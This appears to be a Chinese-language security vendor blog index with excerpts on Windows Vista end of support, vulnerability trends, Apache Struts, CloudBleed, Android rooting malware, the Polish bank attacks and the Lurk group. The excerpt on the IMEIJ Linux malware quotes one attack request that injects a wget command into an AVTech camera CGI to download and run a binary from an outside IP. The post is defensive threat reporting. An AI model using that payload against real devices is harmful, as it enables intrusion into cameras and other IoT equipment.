微軟正式停止更新 Vista ,是時候升級了

網路威脅的數量跟複雜程度都在日漸增加,有勒索病毒 Ransomware (勒索軟體/綁架病毒)會將你最重要的資料鎖住,還有資料竊取惡意軟體跟零時差威脅等…,我們在網路上時刻都要保持小心警惕,但我們也需要軟體廠商所提供的協助。這也是為什麼保持最新的安全更新是件相當重要的事情。

4月11日微軟終止 Windows Vista 作業系統的支援。這對那些尚未升級到更新更安全版本的人來說,也意味著現在時候到了。

Windows Vista 發行以來的十年,網路犯罪已經發展成價值數十億美元的全球性黑色產業

我們都面對著可怕的網路敵人。從Windows Vista發行以來的十年之間,網路犯罪已經真正發展成價值數十億美元的全球性黑色產業。駭客有時從遙遠的國家來攻擊消費者和企業,受到網路匿名保護而逃避了法律制裁。 Continue reading “微軟正式停止更新 Vista ,是時候升級了”

《2016年漏洞回顧》漏洞攻擊套件為何仍使用較舊的漏洞?

我們經常會看到漏洞攻擊套件使用較舊的漏洞,因為這些漏洞仍然存在於被攻擊的系統上。另外,勒索病毒會去利用漏洞攻擊套件來作為主要的感染媒介。

趨勢科技2016年的資安綜合報告 – 「企業威脅創紀錄的一年」中,我們討論了這一年的漏洞發展形勢和所看到的趨勢。

讓我們來看看在2016年間發生的一些重點。

  1. 趨勢科技的零時差計畫(ZDI)在3,000多名獨立漏洞研究人員的支持下,披露了 678個漏洞。可以從下圖看出一些有意思的趨勢:

  • 首先是微軟產品的漏洞在持續減少中。這是個好消息,但對微軟來說不大好的消息是 Edge 漏洞增加了2,100%。這在 2017年的 Pwn2Own 大會中得到進一步的證明,因為 Edge 是競賽中被漏洞攻擊最多的瀏覽器。
  • 其次是整體 Adobe 的漏洞數量下降,不過 Acrobat Reader 在 2016 年被披露的漏洞最多。
  • 零時差攻擊(在修補程式發布前就有針對漏洞的攻擊出現)數量在 2016 年比 2015 年下降。這是個好消息,但我們最近也看到了美國中情局被駭事件,可能有許多零時差漏洞攻擊尚未被披露。
  • Android漏洞數量大幅地增加(206%)。趨勢科技研究人員在 2016 年向 Google 提交了 54 個安全漏洞。
  • 在2016年被披露的 SCADA(資料採集與監控系統)漏洞增加了421%,鑒於對這些設備進行更新的困難度,這對廠商來說會是件頭痛的事。

Continue reading “《2016年漏洞回顧》漏洞攻擊套件為何仍使用較舊的漏洞?”

趨勢科技慶祝 TippingPoint 併購一週年,完成包括團隊及技術整合的多項重大里程碑

【2017年3月16日,台北訊】今年三月,全球網路資安解決方案領導廠商趨勢科技 (東京證券交易所股票代碼:4704) 從 Hewlett Packard Enterprise 手中併購 TippingPoint 公司已屆滿一週年。在組織整合的第一年當中,趨勢科技不僅展現了無比的執行力與業務無縫接軌能力,更在產品創新方面發揚光大,讓新的 TippingPoint 交出比去年成長 25% 的業績,並進一步提升市場領導地位。趨勢科技 TippingPoint 最近更在 2017 年「Gartner 入侵防護系統神奇象限」報告當中榮獲「願景完整性」與「執行力」雙重領導者地位[1]。不僅如此,趨勢科技也在 2016 年 NSS Labs 新一代入侵防護系統 (NGIPS) 測試當中榮獲「推薦」的評價。

趨勢科技明瞭組織整合只許成功不許失敗,因此特別簽下了 300 多名原 TippingPoint 員工以確保 2,500 多家 TippingPoint 大型客戶的服務絕不出現斷層。今年三月,該團隊已順利遷進完善且擁有先進研發實驗室的德州奧斯汀新辦公室。

過去這一年,由於 TippingPoint 業務穩定的發展,使得趨勢科技得以延續其創新歷史。TippingPoint 產品不僅更上層樓,而且與趨勢科技原本的產品完美整合,更加鞏固趨勢團隊在企業網路資安市場的地位和名聲。例如,TippingPoint 的 NGIPS 已與趨勢科技 Deep Discovery 進階威脅防護技術整合,形成一套更強大的 Network Defense 網路防禦解決方案。今年一月,TippingPoint 率先成為第一家提供 100 Gbps 封包檢查吞吐量獨立式 NGIPS 解決方案的廠商,讓資料中心和企業網路能享有低延遲高效能的防護。今年二月,TippingPoint 更導入機器學習技術,成為第一家率先採用機器學習技術在透通模式 (in-line) 即時偵測及攔截攻擊的獨立式 NGIPS 廠商。過去 12 個月當中,趨勢科技申請了 16 項有關機器學習在資安情報應用領域的最新專利。

TippingPoint 的加入也帶來了領先業界的強大資安情報與漏洞研究能力,包括:Digital Vaccine® Labs (DVLabs) 數位疫苗實驗室與 Zero Day Initiative (ZDI) 漏洞懸賞計畫。ZDI 在過去一年當中妥善揭露了 678 漏洞,涵蓋 48 家廠商的產品,此外目前仍在處理當中漏洞的還有將近 400 個。趨勢科技因為能夠提早掌握這些尚未公開的漏洞,因而能夠預先為客戶提供零時差防護。

Continue reading “趨勢科技慶祝 TippingPoint 併購一週年,完成包括團隊及技術整合的多項重大里程碑”

攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。 Continue reading “攻擊 CGI 漏洞的新 Linux 惡意程式”

CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式

 

Apache Struts 是一個免費的開放原始碼程式開發架構,用來開發 Java 網站應用程式。我們仔細研究了過去 Apache Struts 被發現的幾個遠端程式碼執行 (Remote Code Execution,簡稱 RCE) 漏洞之後發現,歹徒大多使用 Object Graph Navigation Language (OGNL) 這個程式語言。OGNL 之所以很容易讓駭客從遠端執行任意的程式碼,是因為 Apache Struts 在大多數的流程當中都用到這個語言。

最近,一位研究人員在 Apache Struts 2 當中新發現一個關於 OGNL 的遠端程式碼執行漏洞:CVE-2017-5638。此外,一份報告也指出網路上已出現實際的漏洞攻擊案例,我們的研究和監控團隊也見過利用該漏洞的攻擊。

攻擊手法

駭客可以發送一個精心設計的網站請求給含有漏洞的伺服器,就能將一個檔案上傳至使用 Jakarta 外掛模組來處理檔案上傳請求的伺服器。

駭客接著在 Content-Type 標頭當中包含所要執行的指令來讓受害的伺服器執行指令。網路上已經出現示範這項攻擊手法的概念驗證

漏洞分析

為了深入了解這項漏洞,我們仔細研究了一下該漏洞的修補程式,我們發現廠商在 FileUploadInterceptor.java 當中已放棄使用「LocalizedTextUtil」這個類別。此類別原本是用來在 HTTP 檔案上傳請求失敗時提供錯誤訊息給使用者。 Continue reading “CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式”

世界駭客大賽Pwn2Own – 永遠不知道有那些新研究將會揭開面紗

 

 

在過去十年的世界駭客大賽Pwn2Own競賽中,不同的人會對此競賽產生不同的感情。它曾被稱為是對瀏覽器的大屠殺,雖然沒有真人倒地。它曾幫人開創自己的事業,或至少,幫他們成就惡名。它被指責同時摧毀了粉絲跟黑特的心。同樣地,在比賽史上沒有粉絲或黑特真的受傷,但內心就不敢保證了。

過去十年來,Pwn2Own已經成為安全研究的根源

更有甚者是指責Pwn2Own不過是個 Security theater (維安劇場) – 只是場精采的秀,但沒有真正出現什麼。但實際上恰恰相反。在過去十年來,Pwn2Own已經成為安全研究的根源。

不只是因為在Pwn2Own上所使用的漏洞都很複雜(當然它們也的確複雜)。這計畫所披露的幾個漏洞都得到社群的讚賞,如Pwnie大獎。除此之外,在Pwn2Own所出現的漏洞也驅動了其他研究,最終讓廠商提出了解決方案。例如在數年前,釋放後使用(UAF, use-after-free)漏洞被用來攻擊瀏覽器,特別是Internet Explorer。結果導致許多研究人員找出UAF漏洞並將其回報給零時差計畫(ZDI)。UAF狂潮讓微軟引入了隔離堆積(Isolated Heap)和記憶體保護(MemoryProtection)等安全措施來防止這些UAF漏洞被利用。這些讓ZDI研究人員去深入研究問題並找出解決方案。這些結果提交給微軟的安全獎勵計畫 – Mitigation Bypass Bounty,並獲得了125,000美元的獎金(全部捐給了慈善機構)。

如果沒有Pwn2Own,UAF會如此熱門嗎?有可能,但被運用在競賽中肯定帶動了這方面的研究,結果就是更加安全的瀏覽器。當然,我們不只是看到了UAF。這些年來已經出現過各種類型的漏洞,而這些漏洞都在比賽出現後變得更加常見(或至少更加流行)。像是沙箱逃脫(sandbox escape)、連接點竄改(junction point manipulation),繞過控制流防護(CFG bypass)和字體濫用(font abuse)都曾如此過。 Continue reading “世界駭客大賽Pwn2Own – 永遠不知道有那些新研究將會揭開面紗”

Android 行動裝置威脅:Root 改機惡意程式和漏洞攻擊,隨著漏洞數量增加而趁勢崛起

趨勢科技 2016 年所攔截到6,500 萬行動裝置威脅,截至 2016 年 12 月為止,我們所蒐集和分析的非重複 Android 惡意程式樣本總數高達 1,920 萬,較 2015 年的 1,070 萬有著飛躍性成長。

就全球來看,目前最普遍的是漏洞攻擊和惡意的 Root 改機程式 。 

根據趨勢科技 Mobile App Reputation Service (MARS) 行動裝置應用程式信譽評等服務,以及 Smart Protection Network™ 全球威脅情報網的統計,2016 年,我們發現了超過 30 個 Android 系統漏洞並通報給 Google 和 Qualcomm。這些資安漏洞分散在 Android 的系統架構、裝置驅動程式以及 Linux 核心。其中有五項是重大漏洞,可能讓駭客取得本地端系統權限 (root) 或者從遠端執行程式碼。在我們所發現的漏洞當中,有 10 個以上可用來駭入系統執行程序,或者用於駭入系統核心。例如,核心加密引擎重大漏洞 (CVE-2016-8418) 可能讓駭客從遠端執行程式碼 (遠端 root 權限)。此外我們也通報了一系列有關 Android 效能系統模組的重大漏洞,可能讓駭客入侵系統核心。而 Android 系統也因為我們和 Google 的合作而增加了一些額外的安全機制

其他 2016 年揭露較大的 Android 漏洞與漏洞攻擊還有  Dirty COW  (CVE-2016-5195)、Rowhammer (CVE-2016-6728)、Drammer 以及 Quadrooter,全都可能讓駭客取得裝置的系統管理 (root) 權限。

隨著更多資安漏洞被發現,Root 改機惡意程式與漏洞攻擊也因此擁有更多的攻擊管道。CVE-2015-1805 就是一個被收錄到 Kingroot 改機程式當中的漏洞,該程式的下載量已高達 2.9 億次。當該程式的原始碼在網路上公開之後,該程式即不斷出現在各種攻擊當中。至於 Godless (ANDROIDOS_GODLESS.HRX) 則是 使用一個開放原始碼 Root 改機套件,該套件收錄了多種漏洞攻擊程式碼。截至六月為止,已有超過 850,000 台 Android 裝置受害,目前已有超過 79,780 個變種在網路上流傳。

另外還有 Ghost Push,其漏洞攻擊程式碼經常暗藏在 Google Play 商店的一些應用程式當中,目前已有 4,383 個變種在網路上流傳。LibSkin (ANDROIDOS_LIBSKIN.A) 首次出現是在 2016 年 2 月,目前已有 1,163 個變種,它會對受害的裝置進行改機 (Root),並偷偷下載及安裝其他應用程式,同時竊取使用者的資料。

有關 2016 年最猖獗的 Android 行動惡意程式 (根據趨勢科技偵測數據) 以及趨勢科技 2016 年所揭露的完整 Android 和 iOS/macOS 漏洞清單,請參考這份文件的「附錄」一節。

 

原文出處:In Review: 2016’s Mobile Threat Landscape Brings Diversity, Scale, and Scope

 

CloudFlare漏洞造成潛在的大規模資料外洩

全球最大型網路服務公司的程式碼出現嚴重缺陷,導致敏感資料會被外洩到網路上。在部落格的事後檢討文章中,CloudFlare詳細說明了其邊際伺服器如何受到緩衝區溢出的影響,導致對使用CloudFlare服務的網站所發出的請求會返回隨機資料位元,這可能包含了私密資訊如API金鑰、使用者憑證、cookies甚至是私人訊息。外洩資料也被搜尋引擎所暫存,增加了被用在惡意用途的可能性。這個漏洞已經被非正式地稱為「CloudBleed」,因為它跟早期的HeartBleed漏洞有相似之處。

「CloudBleed」一開始是由Google研究人員Travis Omandy所發現,他在觀察到對使用CloudFlare服務的網站所發出HTTP請求的異常行為時回報了此一問題。經過分析,CloudFlare將問題追查至其新的cf-html HTML解析程式。具體地說,這個問題跟存在其舊Ragel解析程式內多年的程式碼錯誤有關,不過問題會浮現是因為切換到新解析程式改變了緩衝機制,導致資料外洩的發生。

CloudFlare的即時回應是停用使用有資料外洩問題HTML解析程式的相關功能。此外,也組成了一個團隊來找出和修復解析程式內的錯誤,他們會設法在短時間內完成任務,在資料被更廣泛擴散前將潛在的傷害最小化。

 

網路使用者應該擔心嗎?

考量到使用CloudFlare服務的網站數量和資料可能遭到外洩的有效時間長度(最早可能從2016年9月),這似乎是件應該擔心的事情,特別是對經常使用CloudFlare相關網站的使用者來說。不過該公司也說明了資料外洩所造成的影響並沒有那麼大。據估計,在2月13日至18日期間所造成的資料外洩影響最大,透過CloudFlare所進行的3,300,300個HTTP請求中有約1個(0.00003%)可能會導致記憶體資料外洩。

這一點再加上CloudFlare對此事件的快速回應,顯示出資料外洩的影響應該很小。不過這起事件還是提醒了所有網路使用者必須要做好準備來保護自己最重要的數位資產 – 特別是包含敏感資料的部分。

因為主要問題並非使用者所能夠控制,所以使用者能做的最佳行動是變更使用CloudFlare基礎設施網站上的密碼。除了變更密碼,這或許也是個好時機讓使用者去採用更有效的驗證方法,如雙因子身份認證

 

@原文出處:CloudFlare Flaw Causes Potential Major Data Leak

波蘭銀行和其他金融機構遭受新惡意軟體攻擊

2017年 2月,許多的波蘭銀行回報在系統上出現未曾偵測到的惡意軟體變種。受影響的銀行報告了異常行為,包括連到國外的網路流量、加密的可執行檔和使用者工作站上的惡意軟體。惡意軟體分析顯示一旦其下載到工作站後,它會連到外部伺服器並且進行網路探勘、橫向移動和資料流出。

 

該惡意軟體被懷疑是放在波蘭金融監管局(該國的金融監管機構)網站上。有意思的是,研究人員還發現有證據顯示攻擊所用的程式碼跟墨西哥全國銀行及證券監察委員會及烏拉圭銀行所發生攻擊事件內的程式碼相似

有跡象顯示針對波蘭銀行的攻擊屬於更大規模全球性攻擊活動的一部分,這波攻擊活動針對31個國家的104個金融組織。攻擊者入侵了目標組織的網站,注入惡意程式碼來將訪客重新導向會安裝惡意軟體的漏洞攻擊套件。漏洞攻擊套件是種用來感染訪客的客製化工具,特別是使用目標金融機構所擁有IP地址的使用者。 Continue reading “波蘭銀行和其他金融機構遭受新惡意軟體攻擊”

洗劫金融機構超過4500萬美元,第一批運用無檔案感染技術的網路犯罪集團:Lurk

無檔案感染技術已經被用來將目標電腦加入「Botnet傀儡殭屍網路」、派送勒索病毒、感染銷售端點(PoS)系統及進行點擊詐騙(click fraud)。

Lurk第一批運用無檔案感染技術的網路犯罪集團,如何從一群威脅分子轉變成完整的網路犯罪組織?

為何Lurk 總選擇在午休時間進行惡意內容派送?

沒有單一網路防禦工具可以處理這些威脅,IT 如何因應?

Lurk 興風作浪的這五年

 

無檔案感染(Fileless Infection)就如同其名:沒有下載或寫入惡意檔案到磁碟就感染了系統。無檔案感染並非新技術或罕見,而且對企業和一般使用者都造成了嚴重的威脅,因為它能夠取得權限並且一直待在攻擊者的目標系統內而不被發現。但是無檔案感染技術已經被用來將目標電腦加入「Botnet傀儡殭屍網路」派送勒索病毒感染銷售端點(PoS)系統及進行點擊詐騙(click fraud)。無檔案感染對攻擊者來說,重要的一點是可以先評估中毒系統,確認感染狀態再決定是否繼續或消失無蹤。

典型的Lurk攻擊會利用瀏覽器漏洞將非持久性病毒派送給目標受害者

Lurk屬於第一批在大規模攻擊中有效地運用無檔案感染技術的網路犯罪集團,這些技術之後也成為其他犯罪分子的重要手段。典型的Lurk攻擊會利用瀏覽器漏洞將非持久性病毒派送給目標受害者,在部署其他惡意軟體前先探測其目標。感染鏈有多個階段,可以利用在記憶體內執行的無檔案病毒來進行而無須另外的持久性機制。如果Lurk集團對目標系統不感興趣,則在感染系統內除了來自漏洞攻擊程序的檔案外不會留下其他痕跡。這種隱匿行為讓其惡名昭彰,直到幕後黑手被逮捕而停止了行動。俄羅斯內政部在2月8日逮捕了9名以上的嫌犯。Lurk集團從金融機構獲取超過4500萬美元,同時也破壞了受害者的營運、信譽和重要的一切。

Lurk是如何從一群威脅分子轉變成完整的網路犯罪組織?他們還知道什麼其他的技術可能被其他網路犯罪分子仿效?他們的運作模式如何從針對俄羅斯一般使用者轉成銀行和企業?我們對該組織的觀察是基於對其程式碼、網路流量和網址特徵的分析,我們在俄羅斯數個組織的入侵偵測系統在Lurk集團活動的五年間進行監視。

2011年至2012年初:利用路過式下載「Drive by download」攻擊瀏覽器漏洞進而危害系統

Lurk的網頁攻擊是他們攻擊活動的首要跡象。他們實作了某些機制來防止防毒偵測。比方說,特定時間區段或非其目標區域IP來的網頁連線請求會被重新導到第三方網站(如Google)。 Continue reading “洗劫金融機構超過4500萬美元,第一批運用無檔案感染技術的網路犯罪集團:Lurk”